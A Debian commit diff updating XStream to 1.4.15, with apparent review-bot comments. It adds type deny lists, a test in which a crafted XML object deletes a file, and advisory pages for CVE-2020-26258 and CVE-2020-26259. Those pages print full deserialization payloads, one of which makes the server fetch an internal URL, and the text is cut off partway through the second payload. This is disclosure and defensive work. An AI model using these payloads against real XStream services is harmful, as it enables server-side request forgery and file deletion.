Update upstream source from tag 'upstream/1.4.15'
Update to upstream version '1.4.15'
with Debian dir 69c069b67ff8bb728fa80d7b38983f2e50a40ea5
Markus Koschany
3 years ago
10 | 10 | Before deploying: |
11 | 11 | |
12 | 12 | copy settings-template.xml to ~/.m2/settings.xml adding your Sonatype OSSRH |
13 | username and passwords. | |
13 | username and passwords and also your GPG key and password. | |
14 | 14 | |
15 | 15 | To deploy (optionally adding sources and javadoc jars): |
16 | 16 | mvn deploy |
13 | 13 | <groupId>com.thoughtworks.xstream</groupId> |
14 | 14 | <artifactId>xstream-parent</artifactId> |
15 | 15 | <packaging>pom</packaging> |
16 | <version>1.4.14</version> | |
16 | <version>1.4.15</version> | |
17 | 17 | <name>XStream Parent</name> |
18 | 18 | <url>http://x-stream.github.io</url> |
19 | 19 | <description> |
409 | 409 | <dependency> |
410 | 410 | <groupId>com.thoughtworks.xstream</groupId> |
411 | 411 | <artifactId>xstream</artifactId> |
412 | <version>1.4.14</version> | |
412 | <version>1.4.15</version> | |
413 | 413 | </dependency> |
414 | 414 | <dependency> |
415 | 415 | <groupId>com.thoughtworks.xstream</groupId> |
416 | 416 | <artifactId>xstream</artifactId> |
417 | <version>1.4.14</version> | |
417 | <version>1.4.15</version> | |
418 | 418 | <classifier>tests</classifier> |
419 | 419 | <type>test-jar</type> |
420 | 420 | <scope>test</scope> |
422 | 422 | <dependency> |
423 | 423 | <groupId>com.thoughtworks.xstream</groupId> |
424 | 424 | <artifactId>xstream</artifactId> |
425 | <version>1.4.14</version> | |
425 | <version>1.4.15</version> | |
426 | 426 | <classifier>javadoc</classifier> |
427 | 427 | <scope>provided</scope> |
428 | 428 | </dependency> |
429 | 429 | <dependency> |
430 | 430 | <groupId>com.thoughtworks.xstream</groupId> |
431 | 431 | <artifactId>xstream-hibernate</artifactId> |
432 | <version>1.4.14</version> | |
432 | <version>1.4.15</version> | |
433 | 433 | </dependency> |
434 | 434 | <dependency> |
435 | 435 | <groupId>com.thoughtworks.xstream</groupId> |
436 | 436 | <artifactId>xstream-hibernate</artifactId> |
437 | <version>1.4.14</version> | |
437 | <version>1.4.15</version> | |
438 | 438 | <classifier>javadoc</classifier> |
439 | 439 | <scope>provided</scope> |
440 | 440 | </dependency> |
441 | 441 | <dependency> |
442 | 442 | <groupId>com.thoughtworks.xstream</groupId> |
443 | 443 | <artifactId>xstream-jmh</artifactId> |
444 | <version>1.4.14</version> | |
444 | <version>1.4.15</version> | |
445 | 445 | </dependency> |
446 | 446 | <dependency> |
447 | 447 | <groupId>com.thoughtworks.xstream</groupId> |
448 | 448 | <artifactId>xstream-jmh</artifactId> |
449 | <version>1.4.14</version> | |
449 | <version>1.4.15</version> | |
450 | 450 | <classifier>javadoc</classifier> |
451 | 451 | <scope>provided</scope> |
452 | 452 | </dependency> |
453 | 453 | <dependency> |
454 | 454 | <groupId>com.thoughtworks.xstream</groupId> |
455 | 455 | <artifactId>xstream-benchmark</artifactId> |
456 | <version>1.4.14</version> | |
456 | <version>1.4.15</version> | |
457 | 457 | </dependency> |
458 | 458 | <dependency> |
459 | 459 | <groupId>com.thoughtworks.xstream</groupId> |
460 | 460 | <artifactId>xstream-benchmark</artifactId> |
461 | <version>1.4.14</version> | |
461 | <version>1.4.15</version> | |
462 | 462 | <classifier>javadoc</classifier> |
463 | 463 | <scope>provided</scope> |
464 | 464 | </dependency> |
633 | 633 | <groupId>javax.xml.bind</groupId> |
634 | 634 | <artifactId>jaxb-api</artifactId> |
635 | 635 | <version>${version.javax.xml.bind.api}</version> |
636 | </dependency> | |
637 | <dependency> | |
638 | <groupId>com.sun.xml.ws</groupId> | |
639 | <artifactId>jaxws-rt</artifactId> | |
640 | <version>${version.javax.xml.ws.jaxws.rt}</version> | |
636 | 641 | </dependency> |
637 | 642 | |
638 | 643 | <dependency> |
843 | 848 | <groupId>org.apache.maven.plugins</groupId> |
844 | 849 | <artifactId>maven-gpg-plugin</artifactId> |
845 | 850 | <version>${version.plugin.maven.gpg}</version> |
851 | <configuration> | |
852 | <keyname>${gpg.keyname}</keyname> | |
853 | <passphraseServerId>${gpg.keyname}</passphraseServerId> | |
854 | </configuration> | |
846 | 855 | </plugin> |
847 | 856 | <plugin> |
848 | 857 | <groupId>org.apache.maven.plugins</groupId> |
1113 | 1122 | <version.plugin.maven.deploy>2.3</version.plugin.maven.deploy> |
1114 | 1123 | <version.plugin.maven.enforcer>1.4</version.plugin.maven.enforcer> |
1115 | 1124 | <version.plugin.maven.failsafe>2.22.0</version.plugin.maven.failsafe> |
1116 | <version.plugin.maven.gpg>1.4</version.plugin.maven.gpg> | |
1125 | <version.plugin.maven.gpg>1.6</version.plugin.maven.gpg> | |
1117 | 1126 | <version.plugin.maven.install>2.2</version.plugin.maven.install> |
1118 | 1127 | <version.plugin.maven.jar>2.2</version.plugin.maven.jar> |
1119 | 1128 | <version.plugin.maven.javadoc>2.10</version.plugin.maven.javadoc> |
1141 | 1150 | <version.javax.annotation.api>1.3.2</version.javax.annotation.api> |
1142 | 1151 | <version.javax.inject>2.4.0</version.javax.inject> |
1143 | 1152 | <version.javax.xml.bind.api>2.3.1</version.javax.xml.bind.api> |
1153 | <version.javax.xml.ws.jaxws.rt>2.2</version.javax.xml.ws.jaxws.rt><!-- Java 5 --> | |
1144 | 1154 | <version.jmock>1.0.1</version.jmock> |
1145 | 1155 | <version.joda-time>1.6</version.joda-time> |
1146 | 1156 | <version.junit>3.8.1</version.junit> |
1154 | 1164 | <version.org.jdom2>2.0.5</version.org.jdom2> |
1155 | 1165 | <version.org.json>20080701</version.org.json> |
1156 | 1166 | <version.org.openjdk.jmh>1.21</version.org.openjdk.jmh> |
1157 | <version.org.ops4j.pax.exam>3.5.0</version.org.ops4j.pax.exam><!-- java 6 --> | |
1167 | <version.org.ops4j.pax.exam>3.5.0</version.org.ops4j.pax.exam><!-- Java 6 --> | |
1158 | 1168 | <version.org.slf4j>1.6.1</version.org.slf4j> |
1159 | 1169 | <version.stax>1.2.0</version.stax> |
1160 | 1170 | <version.stax.api>1.0.1</version.stax.api> |
19 | 19 | <id>ossrh-staging</id> |
20 | 20 | <username>your-sonatype.org-id</username> |
21 | 21 | <password>your-sonatype.org-pwd</password> |
22 | </server> | |
22 | </server> | |
23 | <server> | |
24 | <id>${gpg.keyname}</id> | |
25 | <password>your-gpg-key-pwd</password> | |
26 | </server> | |
23 | 27 | </servers> |
28 | <properties> | |
29 | <gpg.keyname>your-gpg-keyname</gpg.keyname> | |
30 | </properties> | |
24 | 31 | </settings> |
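Review bot: The new `<server>` block at template lines 23-26 keeps the GPG key passphrase in clear text in ~/.m2/settings.xml, next to the OSSRH password that was already there, and maven-gpg-plugin 1.6 now reads it through the `passphraseServerId` added to the parent pom in this commit. Maven supports encrypted values for `<server>` passwords (`mvn --encrypt-master-password` into ~/.m2/settings-security.xml, then `mvn --encrypt-password` for each secret), so the template could carry a hint next to each `<password>`, e.g. `<!-- prefer an encrypted value, see mvn --encrypt-password -->`. The `<id>${gpg.keyname}</id>` form also only resolves when the `gpg.keyname` property added below is set, which is worth stating in the same comment so a copied template is not silently left with a literal `${gpg.keyname}` server id.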
13 | 13 | <parent> |
14 | 14 | <groupId>com.thoughtworks.xstream</groupId> |
15 | 15 | <artifactId>xstream-parent</artifactId> |
16 | <version>1.4.14</version> | |
16 | <version>1.4.15</version> | |
17 | 17 | </parent> |
18 | 18 | <artifactId>xstream</artifactId> |
19 | 19 | <packaging>jar</packaging> |
141 | 141 | <groupId>commons-lang</groupId> |
142 | 142 | <artifactId>commons-lang</artifactId> |
143 | 143 | <scope>test</scope> |
144 | </dependency> | |
145 | ||
146 | <dependency> | |
147 | <groupId>com.sun.xml.ws</groupId> | |
148 | <artifactId>jaxws-rt</artifactId> | |
149 | <scope>test</scope> | |
150 | <exclusions> | |
151 | <exclusion> | |
152 | <groupId>javax.xml.ws</groupId> | |
153 | <artifactId>jaxws-api</artifactId> | |
154 | </exclusion> | |
155 | <exclusion> | |
156 | <groupId>com.sun.istack</groupId> | |
157 | <artifactId>istack-commons-runtime</artifactId> | |
158 | </exclusion> | |
159 | <exclusion> | |
160 | <groupId>com.sun.xml.bind</groupId> | |
161 | <artifactId>jaxb-impl</artifactId> | |
162 | </exclusion> | |
163 | <exclusion> | |
164 | <groupId>com.sun.xml.messaging.saaj</groupId> | |
165 | <artifactId>saaj-impl</artifactId> | |
166 | </exclusion> | |
167 | <exclusion> | |
168 | <groupId>com.sun.xml.stream.buffer</groupId> | |
169 | <artifactId>streambuffer</artifactId> | |
170 | </exclusion> | |
171 | <exclusion> | |
172 | <groupId>com.sun.xml.ws</groupId> | |
173 | <artifactId>policy</artifactId> | |
174 | </exclusion> | |
175 | <exclusion> | |
176 | <groupId>com.sun.org.apache.xml.internal</groupId> | |
177 | <artifactId>resolver</artifactId> | |
178 | </exclusion> | |
179 | <exclusion> | |
180 | <groupId>org.glassfish.gmbal</groupId> | |
181 | <artifactId>gmbal-api-only</artifactId> | |
182 | </exclusion> | |
183 | <exclusion> | |
184 | <groupId>org.jvnet</groupId> | |
185 | <artifactId>mimepull</artifactId> | |
186 | </exclusion> | |
187 | <exclusion> | |
188 | <groupId>org.jvnet.staxex</groupId> | |
189 | <artifactId>stax-ex</artifactId> | |
190 | </exclusion> | |
191 | </exclusions> | |
144 | 192 | </dependency> |
145 | 193 | </dependencies> |
146 | 194 |
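Review bot: The new test-scoped `jaxws-rt` dependency at lines 146-192 carries ten exclusions and no explanation of what it is for, so the next person touching this pom cannot tell whether the exclusions are still needed or safe to drop. An XML comment above it would help, e.g. `<!-- test only: supplies com.sun.xml.ws.util.ReadAllStream$FileStream for the acceptance tests added with CVE-2020-26259 -->`, and it should say why the transitive artifacts are cut (presumably because only that one class is exercised). The version comes from the parent's dependencyManagement entry added in the same commit, which is fine but also worth naming in that comment.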
336 | 336 | private static final Pattern IGNORE_ALL = Pattern.compile(".*"); |
337 | 337 | private static final Pattern LAZY_ITERATORS = Pattern.compile(".*\\$LazyIterator"); |
338 | 338 | private static final Pattern JAVAX_CRYPTO = Pattern.compile("javax\\.crypto\\..*"); |
339 | private static final Pattern JAXWS_FILE_STREAM = Pattern.compile(".*\\.ReadAllStream\\$FileStream"); | |
339 | 340 | |
340 | 341 | /** |
341 | 342 | * Constructs a default XStream. |
641 | 642 | } |
642 | 643 | |
643 | 644 | addPermission(AnyTypePermission.ANY); |
644 | denyTypes(new String[]{"java.beans.EventHandler", "java.lang.ProcessBuilder", "javax.imageio.ImageIO$ContainsFilter"}); | |
645 | denyTypesByRegExp(new Pattern[]{LAZY_ITERATORS, JAVAX_CRYPTO}); | |
645 | denyTypes(new String[]{ | |
646 | "java.beans.EventHandler", // | |
647 | "java.lang.ProcessBuilder", // | |
648 | "javax.imageio.ImageIO$ContainsFilter", // | |
649 | "jdk.nashorn.internal.objects.NativeString" }); | |
650 | denyTypesByRegExp(new Pattern[]{LAZY_ITERATORS, JAVAX_CRYPTO, JAXWS_FILE_STREAM}); | |
646 | 651 | allowTypeHierarchy(Exception.class); |
647 | 652 | securityInitialized = false; |
648 | 653 | } |
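Review bot: The entries added at lines 645-650 have no comment tying them to the advisories they close, so nothing in the code tells a later maintainer why `jdk.nashorn.internal.objects.NativeString` or `JAXWS_FILE_STREAM` is denied, nor that `.*\\.ReadAllStream\\$FileStream` is written as a pattern precisely so it matches both the `com.sun.xml.ws.util` and the `com.sun.xml.internal.ws.util` package of that class. Suggest a one-line comment above the block, e.g. `// NativeString and ReadAllStream$FileStream close CVE-2020-26258 / CVE-2020-26259, see the advisory pages`, and a matching one on the `JAXWS_FILE_STREAM` constant at line 339. The `addPermission(AnyTypePermission.ANY)` line above still makes this a blacklist, which the advisory pages in this commit say is not the recommended setup; the javadoc of the enclosing method, which starts outside the hunk, should state that explicitly if it does not already.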
0 | 0 | /* |
1 | 1 | * Copyright (C) 2006 Joe Walnes. |
2 | * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2019 XStream Committers. | |
2 | * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2019, 2020 XStream Committers. | |
3 | 3 | * All rights reserved. |
4 | 4 | * |
5 | 5 | * The software in this package is published under the terms of the BSD |
278 | 278 | final BitSet XML_NAME_CHARS_4TH = new BitSet(0xFFFFF); |
279 | 279 | XML_NAME_CHARS_4TH.set('-'); |
280 | 280 | XML_NAME_CHARS_4TH.set('.'); |
281 | XML_NAME_CHARS_4TH.set('0', '9'); | |
281 | XML_NAME_CHARS_4TH.set('0', '9' + 1); | |
282 | 282 | XML_NAME_CHARS_4TH.set(0xB7); |
283 | 283 | |
284 | 284 | final BitSet XML_NAME_CHARS_5TH = (BitSet)XML_NAME_CHARS_4TH.clone(); |
405 | 405 | XML_NAME_CHARS_4TH.set(0x30FC, 0x30FE + 1); |
406 | 406 | |
407 | 407 | XML_NAME_CHARS_5TH.or(XML_NAME_START_CHARS_5TH); |
408 | XML_NAME_CHARS_5TH.set(0x300, 0x36F); | |
409 | XML_NAME_CHARS_5TH.set(0x203F, 0x2040); | |
408 | XML_NAME_CHARS_5TH.set(0x300, 0x36F + 1); | |
409 | XML_NAME_CHARS_5TH.set(0x203F, 0x2040 + 1); | |
410 | 410 | |
411 | 411 | XML_NAME_START_CHARS = (BitSet)XML_NAME_START_CHARS_4TH.clone(); |
412 | 412 | XML_NAME_START_CHARS.and(XML_NAME_START_CHARS_5TH); |
492 | 492 | // First, fast (common) case: nothing to escape |
493 | 493 | int i = 0; |
494 | 494 | |
495 | for (; i < length; i++ ) { | |
496 | char c = name.charAt(i); | |
497 | if (c == '$' || c == '_' || c <= 27 || c >= 127) { | |
495 | for (; i < length; i++) { | |
496 | final char c = name.charAt(i); | |
497 | if (c < 'A' || (c > 'Z' && c < 'a') || c > 'Z') { | |
498 | 498 | break; |
499 | 499 | } |
500 | 500 | } |
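Review bot: The rewritten fast-path condition at line 497, `c < 'A' || (c > 'Z' && c < 'a') || c > 'Z'`, has a dead middle term: the final `c > 'Z'` already breaks for every character above 'Z', so lowercase letters never stay in the fast path and `(c > 'Z' && c < 'a')` can never be the deciding clause. The last term was presumably meant to be `c > 'z'`, i.e. `if (c < 'A' || (c > 'Z' && c < 'a') || c > 'z') {`. As written the result should still be correct provided the slow path after the loop (outside the hunk) escapes properly, but every name containing a lowercase letter now takes the slow path, which defeats the "fast (common) case" promised by the comment on line 492.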
0 | 0 | /* |
1 | 1 | * Copyright (C) 2005, 2006 Joe Walnes. |
2 | * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2015, 2016 XStream Committers. | |
2 | * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2015, 2016, 2020 XStream Committers. | |
3 | 3 | * All rights reserved. |
4 | 4 | * |
5 | 5 | * The software in this package is published under the terms of the BSD |
76 | 76 | initialize = elementName.charAt(0) == '['; |
77 | 77 | } |
78 | 78 | return Class.forName(elementName, initialize, classLoader); |
79 | } catch (ClassNotFoundException e) { | |
79 | } catch (final ClassNotFoundException e) { | |
80 | throw new CannotResolveClassException(elementName); | |
81 | } catch (final IllegalArgumentException e) { | |
80 | 82 | throw new CannotResolveClassException(elementName); |
81 | 83 | } |
82 | 84 | } |
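Review bot: The new `catch (final IllegalArgumentException e)` at line 81 is indistinguishable from the ClassNotFoundException branch and gives no hint why `Class.forName` would throw it, so it is at risk of being "cleaned up" later; a comment such as `// Class.forName may also throw IllegalArgumentException, see GHPR #228` (the pull request the changelog in this commit names) would pin it. Both branches also drop the original exception when building `CannotResolveClassException(elementName)`; if that exception type offers a cause-taking constructor, passing `e` would keep the stack trace for diagnosis. The duplicated catch is presumably deliberate, since the changelog states the library still targets Java 1.4, which has no multi-catch.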
10 | 10 | package com.thoughtworks.acceptance; |
11 | 11 | |
12 | 12 | import java.beans.EventHandler; |
13 | import java.io.File; | |
14 | import java.io.FileOutputStream; | |
15 | import java.io.IOException; | |
16 | import java.io.InputStream; | |
17 | import java.io.OutputStream; | |
13 | 18 | import java.util.Iterator; |
14 | 19 | |
15 | 20 | import com.thoughtworks.xstream.XStream; |
212 | 217 | // OK |
213 | 218 | } |
214 | 219 | } |
220 | ||
221 | public void testCannotUseJaxwsInputStreamToDeleteFile() { | |
222 | if (JVM.isVersion(5)) { | |
223 | final String xml = "" | |
224 | + "<is class='com.sun.xml.ws.util.ReadAllStream$FileStream'>\n" | |
225 | + " <tempFile>target/junit/test.txt</tempFile>\n" | |
226 | + "</is>"; | |
227 | ||
228 | xstream.aliasType("is", InputStream.class); | |
229 | try { | |
230 | xstream.fromXML(xml); | |
231 | fail("Thrown " + ConversionException.class.getName() + " expected"); | |
232 | } catch (final ForbiddenClassException e) { | |
233 | // OK | |
234 | } | |
235 | } | |
236 | } | |
237 | ||
238 | public void testExplicitlyUseJaxwsInputStreamToDeleteFile() throws IOException { | |
239 | if (JVM.isVersion(5)) { | |
240 | final File testDir = new File("target/junit"); | |
241 | final File testFile = new File(testDir, "test.txt"); | |
242 | try { | |
243 | testDir.mkdirs(); | |
244 | ||
245 | final OutputStream out = new FileOutputStream(testFile); | |
246 | out.write("JUnit".getBytes()); | |
247 | out.flush(); | |
248 | out.close(); | |
249 | ||
250 | assertTrue("Test file " + testFile.getPath() + " does not exist.", testFile.exists()); | |
251 | ||
252 | final String xml = "" | |
253 | + "<is class='com.sun.xml.ws.util.ReadAllStream$FileStream'>\n" | |
254 | + " <tempFile>target/junit/test.txt</tempFile>\n" | |
255 | + "</is>"; | |
256 | ||
257 | xstream.addPermission(AnyTypePermission.ANY); // clear out defaults | |
258 | xstream.aliasType("is", InputStream.class); | |
259 | ||
260 | InputStream is = null; | |
261 | try { | |
262 | is = (InputStream)xstream.fromXML(xml); | |
263 | } catch (final ForbiddenClassException e) { | |
264 | // OK | |
265 | } | |
266 | ||
267 | assertTrue("Test file " + testFile.getPath() + " no longer exists.", testFile.exists()); | |
268 | ||
269 | byte[] data = new byte[10]; | |
270 | is.read(data); | |
271 | is.close(); | |
272 | ||
273 | assertFalse("Test file " + testFile.getPath() + " still exists exist.", testFile.exists()); | |
274 | } finally { | |
275 | if (testFile.exists()) { | |
276 | testFile.delete(); | |
277 | } | |
278 | if (testDir.exists()) { | |
279 | testDir.delete(); | |
280 | } | |
281 | } | |
282 | } | |
283 | } | |
215 | 284 | } |
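Review bot: In `testExplicitlyUseJaxwsInputStreamToDeleteFile` the `catch (final ForbiddenClassException e)` at lines 263-265 swallows the exception and leaves `is` null, so the following `is.read(data)` at line 270 would fail with a NullPointerException instead of a readable assertion. Since the test clears the defaults with `addPermission(AnyTypePermission.ANY)` that exception is not expected here; either drop the try/catch or make the handler `fail("Unexpected " + e);`. The `FileOutputStream` at lines 245-248 is not closed in a finally, so an exception from `write` leaks the handle and, on platforms that lock open files, the cleanup `testFile.delete()` may then fail. Minor: the `fail` message at line 231 names `ConversionException` while the catch expects `ForbiddenClassException`.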
186 | 186 | assertBothWays("\"", "<string>"</string>"); |
187 | 187 | } |
188 | 188 | |
189 | public void testsDigitsOnly() { | |
190 | xstream.alias("0123456789", String.class); | |
191 | assertBothWays("", "<_.0030123456789></_.0030123456789>"); | |
192 | } | |
193 | ||
189 | 194 | public void testDecimalFormatSymbols() { |
190 | 195 | final String xml; |
191 | 196 | if (!JVM.is14()) { |
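Review bot: The new test at lines 189-192 is named `testsDigitsOnly`, breaking the `testXxx` naming of its neighbours such as `testDecimalFormatSymbols`; rename it to `testDigitsOnly`. JUnit 3 (the project pins junit 3.8.1) still runs it because the name starts with `test`, so the slip is cosmetic, but it reads like a typo.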
13 | 13 | <parent> |
14 | 14 | <groupId>com.thoughtworks.xstream</groupId> |
15 | 15 | <artifactId>xstream-parent</artifactId> |
16 | <version>1.4.14</version> | |
16 | <version>1.4.15</version> | |
17 | 17 | </parent> |
18 | 18 | <artifactId>xstream-benchmark</artifactId> |
19 | 19 | <packaging>jar</packaging> |
13 | 13 | <parent> |
14 | 14 | <groupId>com.thoughtworks.xstream</groupId> |
15 | 15 | <artifactId>xstream-parent</artifactId> |
16 | <version>1.4.14</version> | |
16 | <version>1.4.15</version> | |
17 | 17 | </parent> |
18 | 18 | <artifactId>xstream-distribution</artifactId> |
19 | 19 | <packaging>pom</packaging> |
21 | 21 | |
22 | 22 | <p>All versions until and including version 1.4.13 are affected, if using the version out of the box. No user is |
23 | 23 | affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security |
24 | framework</a> with a white list.</p> | |
24 | framework</a> with a whitelist.</p> | |
25 | 25 | |
26 | 26 | <h2 id="description">Description</h2> |
27 | 27 | |
108 | 108 | input stream.</p> |
109 | 109 | |
110 | 110 | <h2 id="workaround">Workaround</h2> |
111 | <p>As recommended, use XStream's security framework to implement a white list for the allowed types.</p> | |
112 | <p>Users of XStream 1.4.13 who want to use XStream default black list can simply add two lines to XStream's setup code:</p> | |
111 | <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types.</p> | |
112 | <p>Users of XStream 1.4.13 who want to use XStream default blacklist can simply add two lines to XStream's setup code:</p> | |
113 | 113 | <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" }); |
114 | 114 | xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class }); |
115 | 115 | </pre></div> |
116 | <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a black list will have to setup such a list from | |
116 | <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from | |
117 | 117 | scratch and deny at least the following types: <em>javax.imageio.ImageIO$ContainsFilter</em>, |
118 | 118 | <em>java.beans.EventHandler</em>, <em>java.lang.ProcessBuilder</em>, <em>java.lang.Void</em> and <em>void</em>.</p> |
119 | 119 | <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" }); |
138 | 138 | |
139 | 139 | <h2 id="credits">Credits</h2> |
140 | 140 | |
141 | <p>Chen L reported the issue to XStream and provided the required information to reproduce it. The issue was found | |
142 | by Zhihong Tian and Hui Lu, both from Guangzhou University.</p> | |
141 | <p>Chen L found and reported the issue to XStream and provided the required information to reproduce it. He was | |
142 | supported by Zhihong Tian and Hui Lu, both from Guangzhou University.</p> | |
143 | 143 | |
144 | 144 | </body> |
145 | 145 | </html>⏎ |
0 | <html> | |
1 | <!-- | |
2 | Copyright (C) 2020 XStream committers. | |
3 | All rights reserved. | |
4 | ||
5 | The software in this package is published under the terms of the BSD | |
6 | style license a copy of which has been included with this distribution in | |
7 | the LICENSE.txt file. | |
8 | ||
9 | Created on 24. November 2020 by Joerg Schaible | |
10 | --> | |
11 | <head> | |
12 | <title>CVE-2020-26258</title> | |
13 | </head> | |
14 | <body> | |
15 | ||
16 | <h2 id="vulnerability">Vulnerability</h2> | |
17 | ||
18 | <p>CVE-2020-26258: A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams | |
19 | from an arbitrary URL referencing a resource in an intranet or the local host.</p> | |
20 | ||
21 | <h2 id="affected_versions">Affected Versions</h2> | |
22 | ||
23 | <p>All versions until and including version 1.4.14 are affected running in a Java environment below Java 15, if | |
24 | using the version out of the box. No user is affected, who followed the recommendation to setup | |
25 | <a href="security.html#framework">XStream's security framework</a> with a whitelist.</p> | |
26 | ||
27 | <h2 id="description">Description</h2> | |
28 | ||
29 | <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects. | |
30 | XStream creates therefore new instances based on these type information. An attacker can manipulate the processed | |
31 | input stream and replace or inject objects, that result in a server-side forgery request.</p> | |
32 | ||
33 | <h2 id="reproduction">Steps to Reproduce</h2> | |
34 | ||
35 | <p>Create a simple HashMap and use XStream to marshal it to XML. Replace the XML with following snippet and | |
36 | unmarshal it again with XStream:</p> | |
37 | <div class="Source XML"><pre><map> | |
38 | <entry> | |
39 | <jdk.nashorn.internal.objects.NativeString> | |
40 | <flags>0</flags> | |
41 | <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'> | |
42 | <dataHandler> | |
43 | <dataSource class='javax.activation.URLDataSource'> | |
44 | <url>http://localhost:8080/internal/:</url> | |
45 | </dataSource> | |
46 | <transferFlavors/> | |
47 | </dataHandler> | |
48 | <dataLen>0</dataLen> | |
49 | </value> | |
50 | </jdk.nashorn.internal.objects.NativeString> | |
51 | <string>test</string> | |
52 | </entry> | |
53 | </map> | |
54 | </pre></div> | |
55 | <div class="Source Java"><pre>XStream xstream = new XStream(); | |
56 | xstream.fromXML(xml); | |
57 | </pre></div> | |
58 | ||
59 | <p>As soon as the XML gets unmarshalled, the payload gets executed and the data from the URL location is collected.</p> | |
60 | ||
61 | <p>Note, this example uses XML, but the attack can be performed for any supported format, e.g. JSON.</p> | |
62 | ||
63 | <h2 id="impact">Impact</h2> | |
64 | ||
65 | <p>The vulnerability may allow a remote attacker to request data from internal resources that are not publicly | |
66 | available only by manipulating the processed input stream.</p> | |
67 | ||
68 | <h2 id="workaround">Workaround</h2> | |
69 | <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types.</p> | |
70 | <p>Users of XStream 1.4.14 who insist to use XStream default blacklist - despite that clear recommendation - can | |
71 | simply add two lines to XStream's setup code:</p> | |
72 | <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" }); | |
73 | xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" }); | |
74 | </pre></div> | |
75 | <p>Users of XStream 1.4.13 who want to use XStream default blacklist can simply add three lines to XStream's setup | |
76 | code:</p> | |
77 | <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" }); | |
78 | xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class }); | |
79 | xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" }); | |
80 | </pre></div> | |
81 | <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from | |
82 | scratch and deny at least the following types: <em>javax.imageio.ImageIO$ContainsFilter</em>, | |
83 | <em>java.beans.EventHandler</em>, <em>java.lang.ProcessBuilder</em>, <em>jdk.nashorn.internal.objects.NativeString</em>, | |
84 | <em>java.lang.Void</em> and <em>void</em> and deny several types by name pattern.</p> | |
85 | <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" }); | |
86 | xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class }); | |
87 | xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" }); | |
88 | </pre></div> | |
89 | <p>Users of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently | |
90 | know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:</p> | |
91 | <div class="Source Java"><pre>xstream.registerConverter(new Converter() { | |
92 | public boolean canConvert(Class type) { | |
93 | return type != null && (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class | |
94 | || type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || type.getName().equals("jdk.nashorn.internal.objects.NativeString") | |
95 | || type == java.lang.Void.class || void.class || Proxy.isProxy(type) | |
96 | || type.getName().startsWith("javax.crypto.") || type.getName().endsWith("$LazyIterator") || type.getName().endsWith(".ReadAllStream$FileStream")); | |
97 | } | |
98 | ||
99 | public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) { | |
100 | throw new ConversionException("Unsupported type due to security reasons."); | |
101 | } | |
102 | ||
103 | public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) { | |
104 | throw new ConversionException("Unsupported type due to security reasons."); | |
105 | } | |
106 | }, XStream.PRIORITY_LOW); | |
107 | </pre></div> | |
108 | ||
109 | <h2 id="credits">Credits</h2> | |
110 | ||
111 | <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p> | |
112 | ||
113 | </body> | |
114 | </html>⏎ |
0 | <html> | |
1 | <!-- | |
2 | Copyright (C) 2020 XStream committers. | |
3 | All rights reserved. | |
4 | ||
5 | The software in this package is published under the terms of the BSD | |
6 | style license a copy of which has been included with this distribution in | |
7 | the LICENSE.txt file. | |
8 | ||
9 | Created on 06. December 2020 by Joerg Schaible | |
10 | --> | |
11 | <head> | |
12 | <title>CVE-2020-26259</title> | |
13 | </head> | |
14 | <body> | |
15 | ||
16 | <h2 id="vulnerability">Vulnerability</h2> | |
17 | ||
18 | <p>CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long | |
19 | as the executing process has sufficient rights.</p> | |
20 | ||
21 | <h2 id="affected_versions">Affected Versions</h2> | |
22 | ||
23 | <p>All versions until and including version 1.4.14 are affected running in a Java environment containing the JAX-WS | |
24 | runtime, if using the version out of the box. No user is affected, who followed the recommendation to setup | |
25 | <a href="security.html#framework">XStream's security framework</a> with a whitelist.</p> | |
26 | ||
27 | <h2 id="description">Description</h2> | |
28 | ||
29 | <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects. | |
30 | XStream creates therefore new instances based on these type information. An attacker can manipulate the processed | |
31 | input stream and replace or inject objects, that result in a server-side forgery request.</p> | |
32 | ||
33 | <h2 id="reproduction">Steps to Reproduce</h2> | |
34 | ||
35 | <p>Create a simple HashMap and use XStream to marshal it to XML. Replace the XML with following snippet and | |
36 | unmarshal it again with XStream:</p> | |
37 | <div class="Source XML"><pre><map> | |
38 | <entry> | |
39 | <jdk.nashorn.internal.objects.NativeString> | |
40 | <flags>0</flags> | |
